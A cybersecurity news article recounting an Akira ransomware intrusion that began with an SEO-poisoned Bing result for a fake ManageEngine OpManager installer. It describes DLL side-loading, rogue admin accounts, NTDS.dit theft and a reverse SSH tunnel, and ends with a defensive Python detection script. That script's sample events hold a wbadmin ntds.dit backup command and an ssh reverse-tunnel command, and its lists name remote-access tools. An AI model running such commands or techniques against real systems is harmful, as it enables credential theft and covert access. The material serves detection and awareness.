Bing Search Results Lead to Akira Ransomware via ManageEngine OpManager
Key Takeaways
- Threat actors leveraged SEO poisoning on Bing to distribute a malicious installer disguised as ManageEngine OpManager.
- The attack chain deployed BumbleBee malware and an AdaptixC2 beacon, culminating in Akira ransomware across the victim’s network.
- The intrusion involved sophisticated lateral movement, credential theft (including Active Directory database exfiltration), and data theft, with over 75GB exfiltrated.
- The entire operation, from initial compromise to ransomware deployment, took approximately 44 hours.
- This incident highlights the critical need for vigilance against search engine manipulation and robust endpoint security measures.
A sophisticated ransomware attack has been traced back to a seemingly innocuous Bing search for a common IT administration tool. Threat actors exploited search engine optimization (SEO) poisoning to insert a counterfeit download link high in Bing’s results, leading an unsuspecting IT administrator to install malware instead of legitimate software. This incident underscores a growing concern: everyday search activities can inadvertently become the initial vector for a severe network breach.
The infiltration began in July 2025 when a user initiated a Bing search for “ManageEngine OpManager,” a widely utilized network monitoring solution. Instead of being directed to the official vendor website, the user landed on a meticulously crafted imposter domain. This deceptive site then delivered a trojanized Microsoft Installer (MSI) package, setting in motion a multi-day intrusion that ultimately resulted in the deployment of Akira ransomware throughout the victim’s network.
Detailed analysis of this intrusion was published by The DFIR Report in a report released on June 29, 2026, in collaboration with Swisscom B2B CSIRT. The report identifies BumbleBee malware and an AdaptixC2 beacon as primary tools used by the attackers to maintain persistent access and navigate the compromised environment.
The attackers demonstrated remarkable patience and precision. They established fraudulent administrative accounts, installed remote access software as a Windows service for stealthy persistence, extracted the Active Directory database, and exfiltrated more than 75GB of sensitive data to a server located in Ukraine. The entire sequence, from the initial click on the malicious link to the full-scale ransomware deployment, was executed in approximately 44 hours.
The impact was devastating. The Akira ransomware, identified as locker.exe, utilized Windows Management Instrumentation (WMI) to erase Volume Shadow Copies before encrypting critical systems. To ensure complete network paralysis, the threat actor returned two days later to encrypt a child domain, leaving no segment of the network unaffected.
ManageEngine OpManager Delivers Akira Ransomware
The infection originated from opmanager[.]pro, a fraudulent domain that achieved high visibility in Bing search results through SEO poisoning. This site meticulously mimicked the authentic ManageEngine download page, subsequently redirecting victims to download-center[.]online, where the malicious MSI installer was served to the target machine.
Upon execution, the ManageEngine-OpManager.msi installer dropped three files into a temporary directory: the legitimate OpManager software (acting as a decoy), consent.exe (a genuine Windows binary copied out of System32), and the BumbleBee loader disguised as msimg32.dll, a library name that consent.exe imports. Because Windows resolves an imported DLL from the application's own directory before it falls back to System32, launching the copied consent.exe loaded the attacker's msimg32.dll instead of the real one. The loader therefore ran inside a signed, trusted Microsoft process, which significantly hinders detection by conventional security solutions.
The MSI package itself was signed with a revoked code-signing certificate issued to “LLC Resource+,” an entity previously linked to BumbleBee malware distribution. The strategic choice to impersonate a ManageEngine installer was deliberate, as IT administrators, who typically manage such tools, possess elevated system privileges, making them prime targets for initial access and broader network compromise.
AdaptixC2, Lateral Movement, and Data Exfiltration
Approximately five hours post-infection, BumbleBee deployed AdgNsy.exe, a renamed version of the legitimate Windows Address Book utility, which was injected with AdaptixC2 shellcode. This established a persistent command-and-control (C2) channel to 172.96.137[.]160, enabling the attacker to commence internal network reconnaissance and identify critical assets, including domain controllers.
The attackers then created two unauthorized domain accounts, backup_DA and backup_EA. Crucially, backup_EA was elevated to the Enterprise Admins group, granting the attackers complete control over the entire Active Directory forest. Subsequently, RustDesk remote access software was installed as a Windows service on multiple servers, ensuring continued access even if other C2 channels were disrupted.
On the second day of the intrusion, the attacker gained access to a domain controller via RDP and extracted the NTDS.dit Active Directory database using wbadmin.exe. Credentials for Veeam were also siphoned from a PostgreSQL database, and LSASS memory was dumped across several hosts. To further evade detection and firewall restrictions, a reverse SSH tunnel was established, routing RDP traffic through an external server.
What You Should Do
- Verify Software Downloads: Always download software directly from official vendor websites. Cross-reference download links and digital signatures before execution, and check the signer's identity, not just the presence of a signature: this installer carried a valid-looking signature from a revoked certificate, and revocation is only caught when the endpoint can actually reach the CA's CRL or OCSP endpoint.
- Enhance Search Engine Vigilance: Be highly skeptical of search results, especially for critical enterprise software. Look for official domains and scrutinize URLs for subtle typos or unusual top-level domains.
- Implement Strong Endpoint Detection and Response (EDR): Utilize EDR solutions to detect anomalous process behavior, DLL side-loading attempts, and unexpected executable drops.
- Monitor for Rogue Accounts and Privilege Escalation: Implement alerts for the creation of new administrative accounts or unexpected additions to highly privileged groups (e.g., Enterprise Admins, Domain Admins).
- Control MSI Execution: Configure Group Policies or endpoint security to restrict the execution of MSI installers from untrusted or network locations.
- Enforce DLL Load Order Controls: Implement controls to mitigate DLL search order hijacking, preventing malicious DLLs from being loaded by legitimate processes.
- Audit Remote Access Tools: Monitor for the installation or registration of remote access software (like RustDesk) as Windows services, as this is a common persistence mechanism for attackers.
- Regularly Backup and Isolate Data: Maintain regular, immutable backups of critical data, and ensure these backups are stored offline or in isolated environments to prevent ransomware encryption.
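The intrusion steps above (rogue backup_DA/backup_EA accounts added to Enterprise Admins, RustDesk registered as a service, wbadmin.exe copying NTDS.dit, a consent.exe copy side-loading msimg32.dll from a temp folder, and a reverse SSH tunnel) map directly onto a handful of Windows event log rules. The block below is an added example, not code from HackersRadar or The DFIR Report, of those rules run over constructed, normalised event records. The hostnames, user names, paths and the exact field names are assumptions about what a SIEM would extract from Security event IDs 4720/4728/4756/4688 and System event ID 7045; the privileged-group and remote-access-tool lists are starting points to extend.

```python
"""
Detection rules for the behaviours described in this intrusion, run over
constructed Windows event records. Added example, not the article's or the
report's own tooling. Event records are simplified dicts with the fields a
SIEM would extract from the Security and System logs; all values are made up.
"""
import re
from dataclasses import dataclass

# Groups whose membership changes always deserve an alert (assumption: extend
# with your own Tier-0 groups).
PRIVILEGED_GROUPS = {"Enterprise Admins", "Domain Admins", "Schema Admins", "Administrators"}

# Remote-access tools seen registered as Windows services for persistence.
# RustDesk is the one named in the report; the rest are common equivalents.
REMOTE_ACCESS_TOOLS = ("rustdesk", "anydesk", "atera", "splashtop", "screenconnect")

# consent.exe legitimately lives only in System32/SysWOW64.
SYSTEM32 = re.compile(r"^[a-z]:\\windows\\(system32|syswow64)\\", re.I)


@dataclass(frozen=True)
class Alert:
    severity: str
    rule: str
    host: str
    detail: str


def check_event(ev: dict) -> list[Alert]:
    """Apply every rule to one normalised event; return zero or more alerts."""
    alerts: list[Alert] = []
    eid, host = ev["event_id"], ev["host"]

    # Security 4728/4756: member added to a security-enabled global/universal group.
    if eid in (4728, 4756) and ev.get("group") in PRIVILEGED_GROUPS:
        alerts.append(Alert("high", "privileged-group-add", host,
                            f"{ev.get('member')} added to {ev['group']} by {ev.get('subject')}"))

    # Security 4720: new account created. Low on its own; together with the
    # rule above it is the backup_DA / backup_EA pattern from this intrusion.
    if eid == 4720:
        alerts.append(Alert("low", "account-created", host,
                            f"{ev.get('target')} created by {ev.get('subject')}"))

    # System 7045: a service was installed. Flag remote-access tooling.
    if eid == 7045:
        blob = f"{ev.get('service_name', '')} {ev.get('image_path', '')}".lower()
        if any(tool in blob for tool in REMOTE_ACCESS_TOOLS):
            alerts.append(Alert("high", "remote-access-service", host,
                                f"service {ev.get('service_name')} -> {ev.get('image_path')}"))

    # Security 4688: process creation (requires command-line auditing enabled).
    if eid == 4688:
        image = ev.get("image", "")
        cmd = ev.get("command_line", "")
        name = image.rsplit("\\", 1)[-1].lower()
        low = cmd.lower()
        # wbadmin used to back up NTDS.dit (or the whole system state) off a DC.
        if name == "wbadmin.exe" and ("ntds" in low or "systemstate" in low):
            alerts.append(Alert("high", "ntds-backup-via-wbadmin", host, cmd))
        # consent.exe running outside System32 is the DLL side-loading setup:
        # a copied binary with a malicious msimg32.dll dropped beside it.
        if name == "consent.exe" and not SYSTEM32.match(image):
            alerts.append(Alert("high", "consent-exe-outside-system32", host, image))
        # ssh -R opens a reverse tunnel; from a server this is rarely benign.
        if name == "ssh.exe" and re.search(r"\s-R(\s|\d)", cmd):
            alerts.append(Alert("medium", "reverse-ssh-tunnel", host, cmd))
    return alerts


def run_rules(events: list[dict]) -> list[Alert]:
    return [alert for ev in events for alert in check_event(ev)]


# Constructed sample telemetry (not from the report): one true positive per
# rule plus two benign events that must not fire.
SAMPLE_EVENTS = [
    {"event_id": 4720, "host": "DC01", "subject": "jdoe", "target": "backup_EA"},
    {"event_id": 4728, "host": "DC01", "subject": "jdoe", "member": "backup_EA", "group": "Enterprise Admins"},
    {"event_id": 4728, "host": "DC01", "subject": "svc_hr", "member": "asmith", "group": "HR-Staff"},
    {"event_id": 7045, "host": "FS01", "service_name": "RustDesk",
     "image_path": "C:\\Program Files\\RustDesk\\rustdesk.exe --service"},
    {"event_id": 7045, "host": "FS01", "service_name": "Spooler",
     "image_path": "C:\\Windows\\System32\\spoolsv.exe"},
    {"event_id": 4688, "host": "DC01", "image": "C:\\Windows\\System32\\wbadmin.exe",
     "command_line": "wbadmin start backup -backuptarget:\\\\FS01\\share -include:C:\\Windows\\NTDS\\ntds.dit -quiet"},
    {"event_id": 4688, "host": "WS-ADMIN", "image": "C:\\Users\\admin\\AppData\\Local\\Temp\\consent.exe",
     "command_line": "consent.exe"},
    {"event_id": 4688, "host": "WS-ADMIN", "image": "C:\\Windows\\System32\\consent.exe",
     "command_line": "consent.exe 123"},
    {"event_id": 4688, "host": "APP01", "image": "C:\\Windows\\System32\\OpenSSH\\ssh.exe",
     "command_line": "ssh.exe -N -R 9000:127.0.0.1:3389 user@203.0.113.10"},
]

if __name__ == "__main__":
    for alert in run_rules(SAMPLE_EVENTS):
        print(f"[{alert.severity:6}] {alert.rule:32} {alert.host:9} {alert.detail}")
```

Run against the sample, the rules raise six alerts and stay silent on the HR group change, the Print Spooler service and the genuine System32 consent.exe. The 4688 rules depend on process command-line logging being enabled (Audit Process Creation plus the "Include command line" policy), and the 7045 rule only sees services registered through the Service Control Manager, so tools started as scheduled tasks need a separate rule.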
Disclaimer: HackersRadar reports on cybersecurity threats and incidents for informational and awareness purposes only. We do not engage in hacking activities, data exfiltration, or the hosting or distribution of stolen or leaked information. All content is based on publicly available sources.